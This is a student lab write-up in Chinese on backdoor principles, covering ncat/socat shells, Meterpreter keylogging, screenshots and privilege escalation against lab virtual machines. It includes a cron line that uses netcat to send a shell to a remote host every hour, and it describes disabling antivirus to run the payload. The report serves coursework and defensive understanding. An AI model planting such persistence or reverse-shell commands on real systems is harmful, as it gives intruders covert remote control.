20145212罗天晨 后门原理与实践


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 我们在安装常用应用软件时,安装过程中附带的可能就有后门程序。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
  • linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 可以获取目标主机摄像头摄像头摄像头!!!这个功能好可怕……
  • 可以提权,并且针对不同的系统,提权的方式有很多种,由于我在实验中尝试用getsystem提权失败之后上网查看了教程,愈发觉得meterpreter很强大很可怕。。其中找到一篇写了windows下各种提权方法的博客,我后来的提权操作也是从这里借鉴的:
    Windows的多种提权方法

(4)如何发现自己有系统有没有被安装后门?

  • 低级一点的后门程序估计寻常的杀毒软件就可以查杀,比如我这次实验做的,一发送给win10主机就被360毙了。
  • 至于隐藏的稍深一些的后门,例如与软件捆绑的后门,我查了一下方法,可以下载一些比较专业的监视软件,例如下载者监视器1.0、Regmon704.rar等进行检测。
  • 还可以用抓包工具分析可疑软件是否有可疑操作,比如连接了一些乱七八糟的ip、在注册表项里操作了之类的。

实验总结体会

做了这次实验觉得小时候看起来无懈可击的电脑实际上漏洞百出,很容易就能被攻击。而且一些后门的存在让人有些无力感,因为windows操作系统本身就极有可能被留有后门……这样的话就算自己再怎么查杀也还是无法幸免,而且其他的操作系统大概也是一样的,感觉好不安。


实践过程记录

一、ncat的使用

1.实现两台虚拟机的互联

  • 本实验中实现了与5226夏艺华的虚拟机互联,以下是对话截图=..=

2.让本机的Windows获得Linux的Shell

  • 如图所示,使用本机windows系统获得linux系统的shell:

3.让linux获得windows的shell

  • 如图所示,在虚拟机中获得了windows的shell之后我输入了ipconfig,成功查看到了windows本机的ip地址信息,不过有很多乱码。

4.使用ncat实现文件传输

  • 如图所示,先在windows中打开监听,然后在linux系统中发送文件:

  • 传输的文件保存在了C:\Users\Lenovo路径下,可以查看:(一开始以为保存在ncat所在的文件目录下=o=找了半天)

5.cron的启动

  • 这里首先在linux中输入crontab -e指令,通过编辑增加一条定时任务
    从图中可以看出我输入的是29 * * * * /bin/netcat 10.1.1.120 5212 -e /bin/sh
    意味着在每个小时的29分,如果有一台ip地址为10.1.1.120的主机监听着linux,就会得到一个shell

  • 29分之前在主机上输入什么都不会有显示,但是一到29分,就可以使用指令查看虚拟机中的相关信息,这里我使用了ls指令,结果如下:

……比较好奇为什么这里使用ls查看到的内容和第二步让本机的Windows获得Linux的Shell中查看到的不一样,而且有乱码…


二、socat的使用

使用socat获取主机操作Shell

  • 原理和之前使用ncat的时候是一样的,这次在linux上绑定端口并且反弹连接,使用windows系统开启监听
  • 这里也是在成功之后使用了ifconfig和ls进行测试:


任务计划启动

  • 在主机的控制面板中找到计划任务,打开任务计划程序,创建一个新任务,在操作选项中选择如下:

  • 进行测试:


三、meterpreter的使用

1.生成后门程序

  • 在虚拟机上使用指令生成后门程序,并通过ncat发送到windows主机上
  • 这里没关360的时候直接被发现并且查杀了……

  • 关闭360之后,打开msf进行相关设置,将端口号和ip地址都改成和生成后门程序时一样的数据,再在windows上运行后门程序:

  • 得到shell,输入dir可以显示windows的磁盘目录信息:

  • 可以通过shell指令得到windows的命令行界面,部分乱码可以忽略,这里使用了slmgr/div命令进行测试,主机上弹出版本号信息:

  • 对windows主机进行击键记录:

  • 对主机进行截屏并查看:

  • 安装系统服务:

  • 提升权限:

输入getuid查看当前用户权限
输入getsystem进行提权,但是这里显示由于环境错误,提权失败

换提权方式:使用MS14-058之类的Exp进行提权,结果这个模块对于64为机不适用

再换==这次显示win10不易受这个攻击??

我是该高兴自己的win10稍微安全那么一点点吗?……试了半天发现都没有正确的攻破win10……于是果断的换成了攻击我安装的win7虚拟机……
成功的进行了提权:

转载于:https://www.cnblogs.com/alovera/p/6542235.html

20145212罗天晨 后门原理与实践相关推荐

  1. 20145212 罗天晨 免杀原理与实践

    20145212 罗天晨 免杀原理与实践 一.基础问题回答 1.杀软是如何检测出恶意代码的? (1)恶意代码有其特有的特征码,杀软将特征码加入检测库中,当检测到一段代码中具有这样的特征码时就可以判断为 ...

  2. 20145212罗天晨 逆向及Bof基础实践

    20145212罗天晨<网络对抗>第1周学习总结--逆向及Bof基础实践 逆向及Bof基础实践 一.实践目标 1.运行原本不可访问的代码片段 2.强行修改程序执行流 3.以及注入运行任意代 ...

  3. 20145226夏艺华 后门原理与实践

    20145226夏艺华 后门原理与实践 实验主要内容 使用ncat.socat实现两台电脑间的后门连接:meterpreter的应用:MSF POST模块的使用 基础问题回答 例举你能想到的一个后门进 ...

  4. 20145212罗天晨 恶意代码分析

    20145212罗天晨 恶意代码分析 一.实验问题 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用什么方法来监控. (1 ...

  5. #20155235 《网络攻防》 实验二 后门原理与实践

    20155235 <网络攻防> 实验二 后门原理与实践 实验目的 建立一个后门连接是如此的简单,功能又如此强大.通过亲手实践并了解这一事实,从而提高自己的安全意识 . 实验内容 (1)使用 ...

  6. Exp2 后门原理与实践 20164323段钊阳

    220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...

  7. 2018-2019 Exp2 后门原理与实践

    2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...

  8. 20145318赵一《网络对抗》后门原理与实践

    20145318赵一<网络对抗>后门原理与实践 知识点 后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法. 在软件的开发阶段,程序员常常会在软件内创建后门程序以便 ...

  9. 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...

最新文章

  1. 解决IndexClosedException: closed
  2. AI扫雷有多牛?他国纷纷来求师学艺(附完整教程)
  3. python类与继承person类_关于python中类的继承及self
  4. MySQL Table--独立表空间
  5. cg word List 1
  6. day14.生成器进阶,推导式
  7. 织梦安全的思路---未实践
  8. Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
  9. 【隧道篇 / IPsec】(5.6) ❀ 01. IPsec 结构与需求 ❀ FortiGate 防火墙
  10. 【Android -- 开源库】Gson 的基本使用
  11. 人民币转换美金的c语言代码大全,JS实现将人民币金额转换为大写的示例代码
  12. 裁员1700人,IBM 声称内部调整团队;谷歌将以26亿美元全现金收购Looker,绝对大手笔...
  13. 汇编语言里 eax, ebx, ecx, edx, esi, edi, ebp, esp这些都是什么意思啊?
  14. 2018千元内的UGP VR一体机开箱评测:ugp vr一体机怎么样真的好吗?
  15. ELK:Logstash 字段名称大小写切换
  16. [ROS] sh脚本文件,source : not found问题
  17. Rasbian系统 树莓派Python环境搭建
  18. 还有猛料?维基解密称只发布了已掌握美中情局文件的1%
  19. 黑苹果-Minisforum u820 opencore0.6.9 config.plist
  20. 最短路:迪杰斯特拉算法

热门文章

  1. 统一告警平台设计方案
  2. 企业为什么要使用云计算,主要有哪些优势?
  3. 支付宝,微信,线上支付流程介绍
  4. java中根遍历后根遍历构造,恳求大佬指点!!!首先标明空子树的先根遍历序列建立一棵二叉树...
  5. 163邮箱注册怎么用,有哪些常用的邮箱使用技巧!
  6. 中国易切削钢行业发展趋势及投资前景分析报告(2021-2026年)
  7. 【错误处理】RuntimeError: Attempting to deserialize object on CUDA device 1 but torch.cuda.device_count
  8. 全球十大外盘外汇交易平台排行榜
  9. 四色原型的学习心得分享
  10. DOS窗口下使用命令打开远程桌面连接